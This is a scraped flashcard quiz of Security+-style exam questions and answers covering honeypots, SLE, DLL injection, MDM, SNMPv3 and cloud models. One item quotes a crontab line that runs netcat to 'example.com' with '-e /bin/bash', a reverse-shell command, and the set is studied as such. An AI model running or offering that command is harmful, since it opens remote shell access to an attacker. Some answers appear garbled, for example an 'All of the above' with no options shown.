Quiz 9

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

Ixxia is a software development team manager. She is concerned about memory leaks in code. What type of testing is most likely to find memory leaks?

Static code analysis

Selah wants to analyze real-world attack patterns against systems similar to what she already has deployed in her organization. She would like to see local commands on a compromised system and have access to any tools or other materials the attackers would normally deploy. What type of technology could he use to do this?

A honeypot

Ryan has been asked to run Nessus on his network. What type of tool has he been asked to run?

A vulnerability scanner

John is running an IDS on his network. Users sometimes report that the IDS flags legitimate traffic as an attack. What describes this?

False positive

How is SLE calculated?

AV * EF

Nick purchases his network devices through a gray market supplier that imports them into his region without an official relationship with the network device manufacturer. What risk should Nick identify when he assesses his supply chain risk?

All of the above

Amanda encounters a Bash script that runs the following command crontab -e * * * * nc example.com 8989 -e/bin/bash. What does this command do?

It sets up a reverse shell.

Gary wants to use a secure configuration benchmark for his organization for Linux. Which of the following organizations would provide a useful, commonly adopted benchmark that he could use?

CIS

Elizabeth is investigating a network breach at her company. She discovers a program that was able to execute code within the address space of another process by using the target process to load a specific library. What best scribes this attack?

DLL injection

Nicole determines how her organization processes data that it collects about its customers and also decides how and why personal information should be processes. What role does Nicole play in her organization.

Data controller

A senior vice president in the organization that Chuck works in recently lost a phone that contained sensitive business plans and information about suppliers, designs, and other important materials. After interviewing the vice president, Chuck finds out that the phone did not have a passcode set and was not encrypted, and that it could not be remotely wiped. What type of control should Chuck recommend for his company to help prevent future issues like this?

Deploy an MDM system

Vincent works for a company that manufactures portable medical devices, such as insulin pumps. He is concerned about ensuring these devices are secure. Which of the following is the most important step for him to take?

Ensure all communications with the device are encrypted

Chris sets up SAN replication for his organization. What has he done?

He has replicated the data on one SAN to another at the block or hardware level.

Charlene has been asked to write a business continuity (BC) plan for her organization. Which of the following will a business continuity plan best handle?

How to keep the organization running during a system outage

The university that Susan works for conducts top secret research for the U.S. Department of Defense as part of a partnership with its engineering school. A recently discovered breach points to the school being compromised for over a year by an advanced persistent threat actor. What consequence of the breach should Susan be most concerned about?

IP theft

What is the most common format for certificates issued by certificate authorities?

PEM

What type of attack involves adding an expression or phrase such as adding "SAFE" to mail headers?

Prepending

What form is the data used for quantum key distribution sent in?

Qubits

Michelle has been asked to sanitize a number of drives to ensure that sensitive data is not exposed when systems are removed from service. Which of the following is not a valid means of sanitizing hard drives?

Quick-formatting the drives

Many smartcards implement a wireless technology to allow them to be used without a card reader. What wireless technology is frequently used to allow the use of smartcards for entry access readers and similar access controls?

RFID

Claire is concerned about an attacker getting information regarding network devices and their configuration in her company. Which protocol should she implement that would be most helpful in mitigating this risk while providing management and reporting about network devices?

SNMPv3

Next-generation firewalls include many cutting-edge features. Which of the following is not a common next-generation firewall capability?

SQL injection

The U.S. Department of Homeland Security (DHS) provides an automated indicator sharing (AIS) service that allows for the federal government and private sector organizations to share threat data in real time. The AIS service uses open source protocols and standard to exchange this information. Which of the following standards does the AIS service use?

STIX and TAXII

Irene wants to use a cloud service for her organization that does not require her to do any coding or system administration, and she wants to do minimal configuration to perform the tasks that her organization needs to accomplish. What type of cloud service is she most likely looking for?

SaaS

As part of his organization's effort to identify a new headquarters locations, Sean reviews the Federal Emergency Management Agency (FEMA) flood maps for the potential location he is reviewing. What process related to disaster recovery planning includes actions like this?

Site risk assessment

Jim's company operates facilities in Illinois, Indiana, and Ohio, but the headquarters is in Illinois. Which state laws does Jim need to review and handle as part of his security program?

State laws in Illinois, Indiana, and Ohio

Fred is responsible for physical security in his company. He wants to find a good way to protect the USB thumb drives that have BitLocker keys stored on them. Which of the following would be the best solution for this situation?

Store the drives i na secure cabinet or safe.

What key forensic tool relies on correctly set system clocks to work properly?

Timelining

What is the primary difference between MDM and UEM?

UEM supports a broader range of devices

Which of the following commands can be used to show the route to a remote system on a a Windows 10 workstation?

tracert


Ensembles d'études connexes

Chapter 8 Quiz: The Appendicular Skeleton

View Set

Personal Finance: Unit 3 - Renting & Owning

View Set

Oxygenation, perfusion, fluid and electrolytes, sensation, and pain

View Set